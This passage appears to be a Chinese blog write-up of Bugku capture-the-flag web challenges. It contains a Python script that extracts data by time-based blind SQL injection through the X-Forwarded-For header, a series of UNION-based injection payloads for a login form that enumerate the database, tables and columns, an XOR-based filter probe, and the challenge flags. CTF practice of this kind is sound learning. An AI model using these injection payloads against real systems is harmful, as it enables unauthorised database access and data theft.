#!usr/bin/env python
#-*- codingutf-8 -*-

import requests
import string 

mystring = string.ascii_letters+string.digits
url='http://120.24.86.145:8002/web15/'
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}')     then sleep(5) else 1 end) and '1'='1"  #这里的{}对应的是后面所需要的format
flag = ''

for i in range(1,35):
    for j in mystring:
        try:
            headers = {'x-forwarded-for':data.format(str(i),j)}
            res = requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout:
            flag += j
            print flag
            break

print 'The final flag:'+flag

这个代码的原理就是利用127.0.0.1+true/false去进行判断,如果是true,就与超时相违背,从而执行下面except的代码.

flag{cdbf14c9551d5be5612f7bb5d2867853}


0x38.这是一个神奇的登陆框

admin_name=yu" order by 3#&admin_passwd=1111&submit=GO+GO+GO

报错,存在注入

admin_name=yu" order by 2#&admin_passwd=1111&submit=GO+GO+GO   #确认列数
admin_name=yu" union select database(),2#&admin_passwd=1111&submit=GO+GO+GO  #数据库名bugkusql1
admin_name=yu" union select table_name,2 from information_schema.tables where table_schema='bugkusql1'#&admin_passwd=1111&submit=GO+GO+GO   #表名flag1
admin_name=yu" union select column_name,2 from information_schema.columns where table_name'flag1'#&admin_passwd=1111&submit=GO+GO+GO   #字段名flag1
admin_name=yu# union select flag1,2 from flag1#&admin_passwd=1111&submit=GO+GO+GO  #拿到flag

flag{ed6b28e684817d9efcaf802979e57aea}


0x39.多次

从大哥那学到了异或注入判断,可以判断页面过滤了什么参数。
id=1后面增加payload:'^(length('union')!=0)^'.如果页面正常回显,则证明length(union)是等于0的,所以union被过滤了.
不过不懂这题怎么做,先跳过.


0x40.PHP_encrypt_1(ISCCCTF)

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>


本文由 saltyfishyu 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论